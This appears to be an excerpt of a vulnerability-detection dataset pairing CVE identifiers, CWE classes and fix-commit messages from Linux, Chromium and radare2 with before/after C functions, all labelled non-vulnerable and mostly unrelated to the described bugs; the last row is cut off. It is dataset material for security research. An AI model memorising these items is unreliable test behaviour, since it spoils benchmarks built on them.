Columns (type and observed length range or cardinality):

CVE ID          stringlengths   13–43
CVE Page        stringlengths   45–48
CWE ID          stringclasses   90 values
codeLink        stringlengths   46–139
commit_id       stringlengths   6–81
commit_message  stringlengths   3–13.3k
func_after      stringlengths   14–241k
func_before     stringlengths   14–241k
lang            stringclasses   3 values
project         stringclasses   309 values
vul             int8            0–1
CVE-2017-18222
https://www.cvedetails.com/cve/CVE-2017-18222/
CWE-119
https://github.com/torvalds/linux/commit/412b65d15a7f8a93794653968308fc100f2aa87c
412b65d15a7f8a93794653968308fc100f2aa87c
net: hns: fix ethtool_get_strings overflow in hns driver hns_get_sset_count() returns HNS_NET_STATS_CNT and the data space allocated is not enough for ethtool_get_strings(), which will cause random memory corruption. When SLAB and DEBUG_SLAB are both enabled, memory corruptions like the following can be observed without this patch: [ 43.115200] Slab corruption (Not tainted): Acpi-ParseExt start=ffff801fb0b69030, len=80 [ 43.115206] Redzone: 0x9f911029d006462/0x5f78745f31657070. [ 43.115208] Last user: [<5f7272655f746b70>](0x5f7272655f746b70) [ 43.115214] 010: 70 70 65 31 5f 74 78 5f 70 6b 74 00 6b 6b 6b 6b ppe1_tx_pkt.kkkk [ 43.115217] 030: 70 70 65 31 5f 74 78 5f 70 6b 74 5f 6f 6b 00 6b ppe1_tx_pkt_ok.k [ 43.115218] Next obj: start=ffff801fb0b69098, len=80 [ 43.115220] Redzone: 0x706d655f6f666966/0x9f911029d74e35b. [ 43.115229] Last user: [<ffff0000084b11b0>](acpi_os_release_object+0x28/0x38) [ 43.115231] 000: 74 79 00 6b 6b 6b 6b 6b 70 70 65 31 5f 74 78 5f ty.kkkkkppe1_tx_ [ 43.115232] 010: 70 6b 74 5f 65 72 72 5f 63 73 75 6d 5f 66 61 69 pkt_err_csum_fai Signed-off-by: Timmy Li <[email protected]> Signed-off-by: David S. Miller <[email protected]>
void hns_rcb_get_common_regs(struct rcb_common_cb *rcb_com, void *data) { u32 *regs = data; bool is_ver1 = AE_IS_VER1(rcb_com->dsaf_dev->dsaf_ver); bool is_dbg = HNS_DSAF_IS_DEBUG(rcb_com->dsaf_dev); u32 reg_tmp; u32 reg_num_tmp; u32 i = 0; /*rcb common registers */ regs[0] = dsaf_read_dev(rcb_com, RCB_COM_CFG_ENDIAN_REG); regs[1] = dsaf_read_dev(rcb_com, RCB_COM_CFG_SYS_FSH_REG); regs[2] = dsaf_read_dev(rcb_com, RCB_COM_CFG_INIT_FLAG_REG); regs[3] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PKT_REG); regs[4] = dsaf_read_dev(rcb_com, RCB_COM_CFG_RINVLD_REG); regs[5] = dsaf_read_dev(rcb_com, RCB_COM_CFG_FNA_REG); regs[6] = dsaf_read_dev(rcb_com, RCB_COM_CFG_FA_REG); regs[7] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PKT_TC_BP_REG); regs[8] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PPE_TNL_CLKEN_REG); regs[9] = dsaf_read_dev(rcb_com, RCB_COM_INTMSK_TX_PKT_REG); regs[10] = dsaf_read_dev(rcb_com, RCB_COM_RINT_TX_PKT_REG); regs[11] = dsaf_read_dev(rcb_com, RCB_COM_INTMASK_ECC_ERR_REG); regs[12] = dsaf_read_dev(rcb_com, RCB_COM_INTSTS_ECC_ERR_REG); regs[13] = dsaf_read_dev(rcb_com, RCB_COM_EBD_SRAM_ERR_REG); regs[14] = dsaf_read_dev(rcb_com, RCB_COM_RXRING_ERR_REG); regs[15] = dsaf_read_dev(rcb_com, RCB_COM_TXRING_ERR_REG); regs[16] = dsaf_read_dev(rcb_com, RCB_COM_TX_FBD_ERR_REG); regs[17] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK_EN_REG); regs[18] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK0_REG); regs[19] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK1_REG); regs[20] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK2_REG); regs[21] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK3_REG); regs[22] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK4_REG); regs[23] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK5_REG); regs[24] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR0_REG); regs[25] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR3_REG); regs[26] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR4_REG); regs[27] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR5_REG); regs[28] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_INTMASK_RING); regs[29] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_RING_STS); regs[30] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_RING); regs[31] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_INTMASK_BD); regs[32] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_BD_RINT_STS); regs[33] = dsaf_read_dev(rcb_com, RCB_COM_RCB_RD_BD_BUSY); regs[34] = dsaf_read_dev(rcb_com, RCB_COM_RCB_FBD_CRT_EN); regs[35] = dsaf_read_dev(rcb_com, RCB_COM_AXI_WR_ERR_INTMASK); regs[36] = dsaf_read_dev(rcb_com, RCB_COM_AXI_ERR_STS); regs[37] = dsaf_read_dev(rcb_com, RCB_COM_CHK_TX_FBD_NUM_REG); /* rcb common entry registers */ for (i = 0; i < 16; i++) { /* total 16 model registers */ regs[38 + i] = dsaf_read_dev(rcb_com, RCB_CFG_BD_NUM_REG + 4 * i); regs[54 + i] = dsaf_read_dev(rcb_com, RCB_CFG_PKTLINE_REG + 4 * i); } reg_tmp = is_ver1 ? RCB_CFG_OVERTIME_REG : RCB_PORT_CFG_OVERTIME_REG; reg_num_tmp = (is_ver1 || is_dbg) ? 1 : 6; for (i = 0; i < reg_num_tmp; i++) regs[70 + i] = dsaf_read_dev(rcb_com, reg_tmp); regs[76] = dsaf_read_dev(rcb_com, RCB_CFG_PKTLINE_INT_NUM_REG); regs[77] = dsaf_read_dev(rcb_com, RCB_CFG_OVERTIME_INT_NUM_REG); /* mark end of rcb common regs */ for (i = 78; i < 80; i++) regs[i] = 0xcccccccc; }
void hns_rcb_get_common_regs(struct rcb_common_cb *rcb_com, void *data) { u32 *regs = data; bool is_ver1 = AE_IS_VER1(rcb_com->dsaf_dev->dsaf_ver); bool is_dbg = HNS_DSAF_IS_DEBUG(rcb_com->dsaf_dev); u32 reg_tmp; u32 reg_num_tmp; u32 i = 0; /*rcb common registers */ regs[0] = dsaf_read_dev(rcb_com, RCB_COM_CFG_ENDIAN_REG); regs[1] = dsaf_read_dev(rcb_com, RCB_COM_CFG_SYS_FSH_REG); regs[2] = dsaf_read_dev(rcb_com, RCB_COM_CFG_INIT_FLAG_REG); regs[3] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PKT_REG); regs[4] = dsaf_read_dev(rcb_com, RCB_COM_CFG_RINVLD_REG); regs[5] = dsaf_read_dev(rcb_com, RCB_COM_CFG_FNA_REG); regs[6] = dsaf_read_dev(rcb_com, RCB_COM_CFG_FA_REG); regs[7] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PKT_TC_BP_REG); regs[8] = dsaf_read_dev(rcb_com, RCB_COM_CFG_PPE_TNL_CLKEN_REG); regs[9] = dsaf_read_dev(rcb_com, RCB_COM_INTMSK_TX_PKT_REG); regs[10] = dsaf_read_dev(rcb_com, RCB_COM_RINT_TX_PKT_REG); regs[11] = dsaf_read_dev(rcb_com, RCB_COM_INTMASK_ECC_ERR_REG); regs[12] = dsaf_read_dev(rcb_com, RCB_COM_INTSTS_ECC_ERR_REG); regs[13] = dsaf_read_dev(rcb_com, RCB_COM_EBD_SRAM_ERR_REG); regs[14] = dsaf_read_dev(rcb_com, RCB_COM_RXRING_ERR_REG); regs[15] = dsaf_read_dev(rcb_com, RCB_COM_TXRING_ERR_REG); regs[16] = dsaf_read_dev(rcb_com, RCB_COM_TX_FBD_ERR_REG); regs[17] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK_EN_REG); regs[18] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK0_REG); regs[19] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK1_REG); regs[20] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK2_REG); regs[21] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK3_REG); regs[22] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK4_REG); regs[23] = dsaf_read_dev(rcb_com, RCB_SRAM_ECC_CHK5_REG); regs[24] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR0_REG); regs[25] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR3_REG); regs[26] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR4_REG); regs[27] = dsaf_read_dev(rcb_com, RCB_ECC_ERR_ADDR5_REG); regs[28] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_INTMASK_RING); regs[29] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_RING_STS); regs[30] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_RING); regs[31] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_INTMASK_BD); regs[32] = dsaf_read_dev(rcb_com, RCB_COM_SF_CFG_BD_RINT_STS); regs[33] = dsaf_read_dev(rcb_com, RCB_COM_RCB_RD_BD_BUSY); regs[34] = dsaf_read_dev(rcb_com, RCB_COM_RCB_FBD_CRT_EN); regs[35] = dsaf_read_dev(rcb_com, RCB_COM_AXI_WR_ERR_INTMASK); regs[36] = dsaf_read_dev(rcb_com, RCB_COM_AXI_ERR_STS); regs[37] = dsaf_read_dev(rcb_com, RCB_COM_CHK_TX_FBD_NUM_REG); /* rcb common entry registers */ for (i = 0; i < 16; i++) { /* total 16 model registers */ regs[38 + i] = dsaf_read_dev(rcb_com, RCB_CFG_BD_NUM_REG + 4 * i); regs[54 + i] = dsaf_read_dev(rcb_com, RCB_CFG_PKTLINE_REG + 4 * i); } reg_tmp = is_ver1 ? RCB_CFG_OVERTIME_REG : RCB_PORT_CFG_OVERTIME_REG; reg_num_tmp = (is_ver1 || is_dbg) ? 1 : 6; for (i = 0; i < reg_num_tmp; i++) regs[70 + i] = dsaf_read_dev(rcb_com, reg_tmp); regs[76] = dsaf_read_dev(rcb_com, RCB_CFG_PKTLINE_INT_NUM_REG); regs[77] = dsaf_read_dev(rcb_com, RCB_CFG_OVERTIME_INT_NUM_REG); /* mark end of rcb common regs */ for (i = 78; i < 80; i++) regs[i] = 0xcccccccc; }
C
linux
0
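The hns commit above is a count/size mismatch (CWE-119): ethtool sizes the strings buffer from the driver's get_sset_count() hook, so the get_strings() hook must never emit more entries than that count. Below is a minimal userspace sketch of that invariant; the names (STATS_CNT, GSTRING_LEN, get_sset_count, get_strings) are illustrative stand-ins, not the driver's real symbols.

```c
/* Sketch of the CWE-119 pattern fixed in the hns commit above: the buffer
 * is sized from the count hook, so the fill hook must be bounded by the
 * same count. All names here are illustrative. */
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

#define GSTRING_LEN 32   /* stands in for ETH_GSTRING_LEN */
#define STATS_CNT   4    /* what the count hook reports */

static int get_sset_count(void) { return STATS_CNT; }

/* the invariant: never write past count * GSTRING_LEN */
static void get_strings(char *data, int count)
{
    for (int i = 0; i < count; i++)
        snprintf(data + i * GSTRING_LEN, GSTRING_LEN, "stat_%d", i);
}

int main(void)
{
    int n = get_sset_count();
    char *buf = calloc((size_t)n, GSTRING_LEN); /* sized from the count hook */
    assert(buf);
    get_strings(buf, n);                        /* bounded by the same count */
    for (int i = 0; i < n; i++)
        puts(buf + i * GSTRING_LEN);
    free(buf);
    return 0;
}
```

The kernel patch restores this invariant by making the two callbacks agree on the number of elements.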
CVE-2011-3102
https://www.cvedetails.com/cve/CVE-2011-3102/
CWE-189
https://github.com/chromium/chromium/commit/4c46d7a5b0af9b7d320e709291b270ab7cf07e83
4c46d7a5b0af9b7d320e709291b270ab7cf07e83
Fix XPointer bug. BUG=125462 [email protected] [email protected] Review URL: https://chromiumcodereview.appspot.com/10344022 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@135174 0039d316-1c4b-4281-b951-d872f2087c98
xmlXPtrStartPointFunction(xmlXPathParserContextPtr ctxt, int nargs) { xmlXPathObjectPtr tmp, obj, point; xmlLocationSetPtr newset = NULL; xmlLocationSetPtr oldset = NULL; CHECK_ARITY(1); if ((ctxt->value == NULL) || ((ctxt->value->type != XPATH_LOCATIONSET) && (ctxt->value->type != XPATH_NODESET))) XP_ERROR(XPATH_INVALID_TYPE) obj = valuePop(ctxt); if (obj->type == XPATH_NODESET) { /* * First convert to a location set */ tmp = xmlXPtrNewLocationSetNodeSet(obj->nodesetval); xmlXPathFreeObject(obj); obj = tmp; } newset = xmlXPtrLocationSetCreate(NULL); if (newset == NULL) { xmlXPathFreeObject(obj); XP_ERROR(XPATH_MEMORY_ERROR); } oldset = (xmlLocationSetPtr) obj->user; if (oldset != NULL) { int i; for (i = 0; i < oldset->locNr; i++) { tmp = oldset->locTab[i]; if (tmp == NULL) continue; point = NULL; switch (tmp->type) { case XPATH_POINT: point = xmlXPtrNewPoint(tmp->user, tmp->index); break; case XPATH_RANGE: { xmlNodePtr node = tmp->user; if (node != NULL) { if (node->type == XML_ATTRIBUTE_NODE) { /* TODO: Namespace Nodes ??? */ xmlXPathFreeObject(obj); xmlXPtrFreeLocationSet(newset); XP_ERROR(XPTR_SYNTAX_ERROR); } point = xmlXPtrNewPoint(node, tmp->index); } break; } default: /*** Should we raise an error ? xmlXPathFreeObject(obj); xmlXPathFreeObject(newset); XP_ERROR(XPATH_INVALID_TYPE) ***/ break; } if (point != NULL) xmlXPtrLocationSetAdd(newset, point); } } xmlXPathFreeObject(obj); valuePush(ctxt, xmlXPtrWrapLocationSet(newset)); }
xmlXPtrStartPointFunction(xmlXPathParserContextPtr ctxt, int nargs) { xmlXPathObjectPtr tmp, obj, point; xmlLocationSetPtr newset = NULL; xmlLocationSetPtr oldset = NULL; CHECK_ARITY(1); if ((ctxt->value == NULL) || ((ctxt->value->type != XPATH_LOCATIONSET) && (ctxt->value->type != XPATH_NODESET))) XP_ERROR(XPATH_INVALID_TYPE) obj = valuePop(ctxt); if (obj->type == XPATH_NODESET) { /* * First convert to a location set */ tmp = xmlXPtrNewLocationSetNodeSet(obj->nodesetval); xmlXPathFreeObject(obj); obj = tmp; } newset = xmlXPtrLocationSetCreate(NULL); if (newset == NULL) { xmlXPathFreeObject(obj); XP_ERROR(XPATH_MEMORY_ERROR); } oldset = (xmlLocationSetPtr) obj->user; if (oldset != NULL) { int i; for (i = 0; i < oldset->locNr; i++) { tmp = oldset->locTab[i]; if (tmp == NULL) continue; point = NULL; switch (tmp->type) { case XPATH_POINT: point = xmlXPtrNewPoint(tmp->user, tmp->index); break; case XPATH_RANGE: { xmlNodePtr node = tmp->user; if (node != NULL) { if (node->type == XML_ATTRIBUTE_NODE) { /* TODO: Namespace Nodes ??? */ xmlXPathFreeObject(obj); xmlXPtrFreeLocationSet(newset); XP_ERROR(XPTR_SYNTAX_ERROR); } point = xmlXPtrNewPoint(node, tmp->index); } break; } default: /*** Should we raise an error ? xmlXPathFreeObject(obj); xmlXPathFreeObject(newset); XP_ERROR(XPATH_INVALID_TYPE) ***/ break; } if (point != NULL) xmlXPtrLocationSetAdd(newset, point); } } xmlXPathFreeObject(obj); valuePush(ctxt, xmlXPtrWrapLocationSet(newset)); }
C
Chrome
0
CVE-2014-0038
https://www.cvedetails.com/cve/CVE-2014-0038/
CWE-20
https://github.com/torvalds/linux/commit/2def2ef2ae5f3990aabdbe8a755911902707d268
2def2ef2ae5f3990aabdbe8a755911902707d268
x86, x32: Correct invalid use of user timespec in the kernel The x32 case for the recvmsg() timeout handling is broken: asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg, unsigned int vlen, unsigned int flags, struct compat_timespec __user *timeout) { int datagrams; struct timespec ktspec; if (flags & MSG_CMSG_COMPAT) return -EINVAL; if (COMPAT_USE_64BIT_TIME) return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen, flags | MSG_CMSG_COMPAT, (struct timespec *) timeout); ... The timeout pointer parameter is provided by userland (hence the __user annotation) but for x32 syscalls it's simply cast to a kernel pointer and is passed to __sys_recvmmsg which will eventually directly dereference it for both reading and writing. Other callers to __sys_recvmmsg properly copy from userland to the kernel first. The bug was introduced by commit ee4fa23c4bfc ("compat: Use COMPAT_USE_64BIT_TIME in net/compat.c") and should affect all kernels since 3.4 (and perhaps vendor kernels if they backported x32 support along with this code). Note that CONFIG_X86_X32_ABI gets enabled at build time and only if CONFIG_X86_X32 is enabled and ld can build x32 executables. Other uses of COMPAT_USE_64BIT_TIME seem fine. This addresses CVE-2014-0038. Signed-off-by: PaX Team <[email protected]> Signed-off-by: H. Peter Anvin <[email protected]> Cc: <[email protected]> # v3.4+ Signed-off-by: Linus Torvalds <[email protected]>
static int do_set_sock_timeout(struct socket *sock, int level, int optname, char __user *optval, unsigned int optlen) { struct compat_timeval __user *up = (struct compat_timeval __user *)optval; struct timeval ktime; mm_segment_t old_fs; int err; if (optlen < sizeof(*up)) return -EINVAL; if (!access_ok(VERIFY_READ, up, sizeof(*up)) || __get_user(ktime.tv_sec, &up->tv_sec) || __get_user(ktime.tv_usec, &up->tv_usec)) return -EFAULT; old_fs = get_fs(); set_fs(KERNEL_DS); err = sock_setsockopt(sock, level, optname, (char *)&ktime, sizeof(ktime)); set_fs(old_fs); return err; }
static int do_set_sock_timeout(struct socket *sock, int level, int optname, char __user *optval, unsigned int optlen) { struct compat_timeval __user *up = (struct compat_timeval __user *)optval; struct timeval ktime; mm_segment_t old_fs; int err; if (optlen < sizeof(*up)) return -EINVAL; if (!access_ok(VERIFY_READ, up, sizeof(*up)) || __get_user(ktime.tv_sec, &up->tv_sec) || __get_user(ktime.tv_usec, &up->tv_usec)) return -EFAULT; old_fs = get_fs(); set_fs(KERNEL_DS); err = sock_setsockopt(sock, level, optname, (char *)&ktime, sizeof(ktime)); set_fs(old_fs); return err; }
C
linux
0
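The fix pattern the commit message describes is the standard one: snapshot the contents of a __user pointer into kernel memory (copy_from_user or compat_get_timespec) before the core syscall logic reads or writes it, instead of casting the user pointer and dereferencing it directly. A hedged, self-contained sketch with stubbed kernel primitives; copy_from_user_stub and sys_recvmmsg_core are hypothetical stand-ins, not kernel functions.

```c
/* Sketch of the CVE-2014-0038 fix pattern: copy a user-supplied timespec
 * into a kernel-owned struct before the core ever sees it. Stubs stand in
 * for kernel primitives. */
#include <stdio.h>
#include <string.h>
#include <time.h>

/* stand-in for copy_from_user(): returns 0 on success */
static int copy_from_user_stub(void *dst, const void *user_src, size_t n)
{
    if (!user_src)
        return -1;          /* stands in for access_ok() failing */
    memcpy(dst, user_src, n);
    return 0;
}

static int sys_recvmmsg_core(struct timespec *kts)
{
    /* the core may read *and write* the timeout; it must only ever be
     * handed a kernel copy, never a raw userland pointer */
    printf("timeout = %ld.%09ld\n", (long)kts->tv_sec, (long)kts->tv_nsec);
    return 0;
}

static int compat_recvmmsg(const struct timespec *user_timeout)
{
    struct timespec ktspec;

    /* the fix: snapshot the user-supplied value first ... */
    if (copy_from_user_stub(&ktspec, user_timeout, sizeof(ktspec)))
        return -14;         /* -EFAULT */
    /* ... then pass the kernel copy to the core */
    return sys_recvmmsg_core(&ktspec);
}

int main(void)
{
    struct timespec t = { .tv_sec = 5, .tv_nsec = 0 };
    return compat_recvmmsg(&t);
}
```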
CVE-2014-3610
https://www.cvedetails.com/cve/CVE-2014-3610/
CWE-264
https://github.com/torvalds/linux/commit/854e8bb1aa06c578c2c9145fa6bfe3680ef63b23
854e8bb1aa06c578c2c9145fa6bfe3680ef63b23
KVM: x86: Check non-canonical addresses upon WRMSR Upon WRMSR, the CPU should inject #GP if a non-canonical value (address) is written to certain MSRs. The behavior is "almost" identical for AMD and Intel (ignoring MSRs that are not implemented in either architecture since they would anyhow #GP). However, IA32_SYSENTER_ESP and IA32_SYSENTER_EIP cause #GP if non-canonical address is written on Intel but not on AMD (which ignores the top 32-bits). Accordingly, this patch injects a #GP on the MSRs which behave identically on Intel and AMD. To eliminate the differences between the architectures, the value which is written to IA32_SYSENTER_ESP and IA32_SYSENTER_EIP is turned to canonical value before writing instead of injecting a #GP. Some references from Intel and AMD manuals: According to Intel SDM description of WRMSR instruction #GP is expected on WRMSR "If the source register contains a non-canonical address and ECX specifies one of the following MSRs: IA32_DS_AREA, IA32_FS_BASE, IA32_GS_BASE, IA32_KERNEL_GS_BASE, IA32_LSTAR, IA32_SYSENTER_EIP, IA32_SYSENTER_ESP." According to AMD manual instruction manual: LSTAR/CSTAR (SYSCALL): "The WRMSR instruction loads the target RIP into the LSTAR and CSTAR registers. If an RIP written by WRMSR is not in canonical form, a general-protection exception (#GP) occurs." IA32_GS_BASE and IA32_FS_BASE (WRFSBASE/WRGSBASE): "The address written to the base field must be in canonical form or a #GP fault will occur." IA32_KERNEL_GS_BASE (SWAPGS): "The address stored in the KernelGSbase MSR must be in canonical form." This patch fixes CVE-2014-3610. Cc: [email protected] Signed-off-by: Nadav Amit <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
static inline void sync_lapic_to_cr8(struct kvm_vcpu *vcpu) { struct vcpu_svm *svm = to_svm(vcpu); u64 cr8; if (is_guest_mode(vcpu) && (vcpu->arch.hflags & HF_VINTR_MASK)) return; cr8 = kvm_get_cr8(vcpu); svm->vmcb->control.int_ctl &= ~V_TPR_MASK; svm->vmcb->control.int_ctl |= cr8 & V_TPR_MASK; }
static inline void sync_lapic_to_cr8(struct kvm_vcpu *vcpu) { struct vcpu_svm *svm = to_svm(vcpu); u64 cr8; if (is_guest_mode(vcpu) && (vcpu->arch.hflags & HF_VINTR_MASK)) return; cr8 = kvm_get_cr8(vcpu); svm->vmcb->control.int_ctl &= ~V_TPR_MASK; svm->vmcb->control.int_ctl |= cr8 & V_TPR_MASK; }
C
linux
0
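On x86-64 with 48-bit virtual addresses, "canonical" means bits 63..47 all equal bit 47. Below is a standalone sketch of the check the commit message describes, plus the sign-extension that forces a value canonical (as the patch does for IA32_SYSENTER_ESP/EIP); the helper names are illustrative, not KVM's.

```c
/* Canonical-address test behind the KVM fix above: sign-extend from bit 47
 * and compare. A mismatch means WRMSR should raise #GP for MSRs such as
 * IA32_LSTAR. Helper names are illustrative. */
#include <stdint.h>
#include <stdio.h>

#define VA_BITS 48

static int is_canonical(uint64_t addr)
{
    return (uint64_t)((int64_t)(addr << (64 - VA_BITS)) >> (64 - VA_BITS))
           == addr;
}

/* force a value canonical, as the patch does for SYSENTER_ESP/EIP */
static uint64_t make_canonical(uint64_t addr)
{
    return (uint64_t)((int64_t)(addr << (64 - VA_BITS)) >> (64 - VA_BITS));
}

int main(void)
{
    uint64_t good = 0xffff800000000000ULL; /* bits 63..47 match bit 47 */
    uint64_t bad  = 0x0000800000000000ULL; /* bit 47 set, upper bits clear */
    printf("good canonical? %d\n", is_canonical(good)); /* 1 */
    printf("bad  canonical? %d\n", is_canonical(bad));  /* 0 */
    printf("forced: %#llx\n", (unsigned long long)make_canonical(bad));
    return 0;
}
```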
null
null
null
https://github.com/chromium/chromium/commit/c10688623b331e0c72c502b718cff5016de61f85
c10688623b331e0c72c502b718cff5016de61f85
Don't force callers to be ASCII (when some of them already aren't). TBR=tfarina BUG=none TEST=none Review URL: http://codereview.chromium.org/3137015 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@56451 0039d316-1c4b-4281-b951-d872f2087c98
bool Environment::HasVar(const char* variable_name) { return GetVar(variable_name, NULL); }
bool Environment::HasVar(const char* variable_name) { return GetVar(variable_name, NULL); }
C
Chrome
0
CVE-2012-6712
https://www.cvedetails.com/cve/CVE-2012-6712/
CWE-119
https://github.com/torvalds/linux/commit/2da424b0773cea3db47e1e81db71eeebde8269d4
2da424b0773cea3db47e1e81db71eeebde8269d4
iwlwifi: Sanity check for sta_id On my testing, I saw some strange behavior [ 421.739708] iwlwifi 0000:01:00.0: ACTIVATE a non DRIVER active station id 148 addr 00:00:00:00:00:00 [ 421.739719] iwlwifi 0000:01:00.0: iwl_sta_ucode_activate Added STA id 148 addr 00:00:00:00:00:00 to uCode not sure how it happened, but adding the sanity check to prevent memory corruption Signed-off-by: Wey-Yi Guy <[email protected]> Signed-off-by: John W. Linville <[email protected]>
int iwlagn_add_bssid_station(struct iwl_priv *priv, struct iwl_rxon_context *ctx, const u8 *addr, u8 *sta_id_r) { int ret; u8 sta_id; struct iwl_link_quality_cmd *link_cmd; unsigned long flags; if (sta_id_r) *sta_id_r = IWL_INVALID_STATION; ret = iwl_add_station_common(priv, ctx, addr, 0, NULL, &sta_id); if (ret) { IWL_ERR(priv, "Unable to add station %pM\n", addr); return ret; } if (sta_id_r) *sta_id_r = sta_id; spin_lock_irqsave(&priv->shrd->sta_lock, flags); priv->stations[sta_id].used |= IWL_STA_LOCAL; spin_unlock_irqrestore(&priv->shrd->sta_lock, flags); /* Set up default rate scaling table in device's station table */ link_cmd = iwl_sta_alloc_lq(priv, ctx, sta_id); if (!link_cmd) { IWL_ERR(priv, "Unable to initialize rate scaling for station %pM.\n", addr); return -ENOMEM; } ret = iwl_send_lq_cmd(priv, ctx, link_cmd, CMD_SYNC, true); if (ret) IWL_ERR(priv, "Link quality command failed (%d)\n", ret); spin_lock_irqsave(&priv->shrd->sta_lock, flags); priv->stations[sta_id].lq = link_cmd; spin_unlock_irqrestore(&priv->shrd->sta_lock, flags); return 0; }
int iwlagn_add_bssid_station(struct iwl_priv *priv, struct iwl_rxon_context *ctx, const u8 *addr, u8 *sta_id_r) { int ret; u8 sta_id; struct iwl_link_quality_cmd *link_cmd; unsigned long flags; if (sta_id_r) *sta_id_r = IWL_INVALID_STATION; ret = iwl_add_station_common(priv, ctx, addr, 0, NULL, &sta_id); if (ret) { IWL_ERR(priv, "Unable to add station %pM\n", addr); return ret; } if (sta_id_r) *sta_id_r = sta_id; spin_lock_irqsave(&priv->shrd->sta_lock, flags); priv->stations[sta_id].used |= IWL_STA_LOCAL; spin_unlock_irqrestore(&priv->shrd->sta_lock, flags); /* Set up default rate scaling table in device's station table */ link_cmd = iwl_sta_alloc_lq(priv, ctx, sta_id); if (!link_cmd) { IWL_ERR(priv, "Unable to initialize rate scaling for station %pM.\n", addr); return -ENOMEM; } ret = iwl_send_lq_cmd(priv, ctx, link_cmd, CMD_SYNC, true); if (ret) IWL_ERR(priv, "Link quality command failed (%d)\n", ret); spin_lock_irqsave(&priv->shrd->sta_lock, flags); priv->stations[sta_id].lq = link_cmd; spin_unlock_irqrestore(&priv->shrd->sta_lock, flags); return 0; }
C
linux
0
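The sanity check this commit adds boils down to range-checking a firmware-supplied station index before it is used to address the driver's station table (the id 148 in the log is far past the array). A minimal sketch of the idiom; the array size and names are illustrative, not the driver's.

```c
/* Sketch of the sanity-check idiom from the iwlwifi commit above: never
 * index the station table with an unvalidated id. Names and the array
 * size are illustrative. */
#include <stdio.h>

#define STATION_COUNT 16

struct station { int used; };
static struct station stations[STATION_COUNT];

static int activate_station(unsigned int sta_id)
{
    /* the fix: reject out-of-range ids instead of trusting them */
    if (sta_id >= STATION_COUNT) {
        fprintf(stderr, "refusing bogus station id %u\n", sta_id);
        return -1;
    }
    stations[sta_id].used = 1;
    return 0;
}

int main(void)
{
    activate_station(3);    /* ok */
    activate_station(148);  /* rejected; previously wrote out of bounds */
    return 0;
}
```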
CVE-2014-3171
https://www.cvedetails.com/cve/CVE-2014-3171/
null
https://github.com/chromium/chromium/commit/d10a8dac48d3a9467e81c62cb45208344f4542db
d10a8dac48d3a9467e81c62cb45208344f4542db
Replace further questionable HashMap::add usages in bindings BUG=390928 [email protected] Review URL: https://codereview.chromium.org/411273002 git-svn-id: svn://svn.chromium.org/blink/trunk@178823 bbb929c8-8fbe-4397-9dbb-9b2b20218538
String errorMessage() { return m_errorMessage; }
String errorMessage() { return m_errorMessage; }
C
Chrome
0
CVE-2017-5061
https://www.cvedetails.com/cve/CVE-2017-5061/
CWE-362
https://github.com/chromium/chromium/commit/5d78b84d39bd34bc9fce9d01c0dcd5a22a330d34
5d78b84d39bd34bc9fce9d01c0dcd5a22a330d34
(Reland) Discard compositor frames from unloaded web content This is a reland of https://codereview.chromium.org/2707243005/ with a small change to fix an uninitialized memory error that fails on MSAN bots. BUG=672847 [email protected], [email protected] CQ_INCLUDE_TRYBOTS=master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_site_isolation Review-Url: https://codereview.chromium.org/2731283003 Cr-Commit-Position: refs/heads/master@{#454954}
LayerTreeHostTestSetNeedsRedraw() : num_commits_(0), num_draws_(0) {}
LayerTreeHostTestSetNeedsRedraw() : num_commits_(0), num_draws_(0) {}
C
Chrome
0
CVE-2017-16359
https://www.cvedetails.com/cve/CVE-2017-16359/
CWE-476
https://github.com/radare/radare2/commit/62e39f34b2705131a2d08aff0c2e542c6a52cf0e
62e39f34b2705131a2d08aff0c2e542c6a52cf0e
Fix #8764 - huge vd_aux caused pointer wraparound
